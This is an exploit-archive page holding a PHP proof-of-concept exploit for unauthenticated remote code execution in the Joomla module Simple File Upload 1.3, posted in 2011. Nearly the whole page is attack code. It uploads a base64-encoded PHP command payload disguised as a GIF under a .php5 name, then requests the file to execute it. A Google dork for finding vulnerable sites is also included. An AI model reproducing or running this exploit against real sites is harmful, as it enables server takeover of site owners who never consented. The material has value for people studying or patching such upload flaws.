Home / exploits Joomla Simple File Upload 1.3 Remote Code Execution
Posted on 29 December 2011
<?PHP /* -------------------------------------------------------------------------------- Title: Simple File Upload v1.3 (module for joomla) Remote Code Execution Exploit -------------------------------------------------------------------------------- Author...............: gmda Google Dork..........:"Simple File Upload v1.3" "Powered by Joomla" Mail.................: gmda[at]email[dot]it Site.................: http://www.gmda.altervista.org/ Date.................: 26/12/2011 Software Link: http://wasen.net/downloads/mod_simpleFileUpload.1.3.zip Version: 1.3 Tested on: winxp php version 5.3.2 Apache 2.0 *the setup of the module is no captcha other setups are the default* +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ The vulnerability is closed to transmit malformed packets to the server that he still plays and saves in his belly. This thing can be a bad intent to send commands to the server running clearly causing safety problems ........ The script has peroblemi upload quality control ..... */ $host="127.0.0.1"; $port=80; $shell="R0lGOC8qLyo8P3BocCBwYXNzdGhydSgnY2FsYycpPz4vKg=="; $ContentType="image/gif"; $post="POST http://$host/Joomla_1.5.23_ita-Stable_test_expl/index.php"; $fp = fsockopen($host, $port, $errno, $errstr, 30); $filename="file.php5"; if(!$fp) die($errstr.$errno); else { $data="-----------------------------41184676334 "; $data.="Content-Disposition: form-data; name="MAX_FILE_SIZE" "; $data.=" "; $data.="100000 -----------------------------41184676334 "; $data.="Content-Disposition: form-data;name="sfuFormFields44" "; $data.=" "; $data.="-----------------------------41184676334 "; $data.="Content-Disposition:form-data; name="uploadedfile44[]"; filename="file.php5" Content-Type: image/gif "; $data.=base64_decode($shell)." "; $data.="-----------------------------41184676334-- "; $packet="$post HTTP/1.1 "; $packet.="Host: ".$host.":".$port." "; $packet.="Content-Type: multipart/form-data; boundary=---------------------------41184676334 "; $packet.="Content-Length: ".strlen($data)." "; $packet.="Connection: Close "; $packet.=$data; fwrite($fp, $packet); fclose($fp); } $h = @fopen("http://".$host."/Joomla_1.5.23_ita-Stable_test_expl/images/file.php5", "r"); if ($h) { while (($buf = fgets($h, 4096)) !== false) { echo $buf; echo("exploit was successful"); } fclose($h); }else{ echo("Error: exploit fail"); } ?>
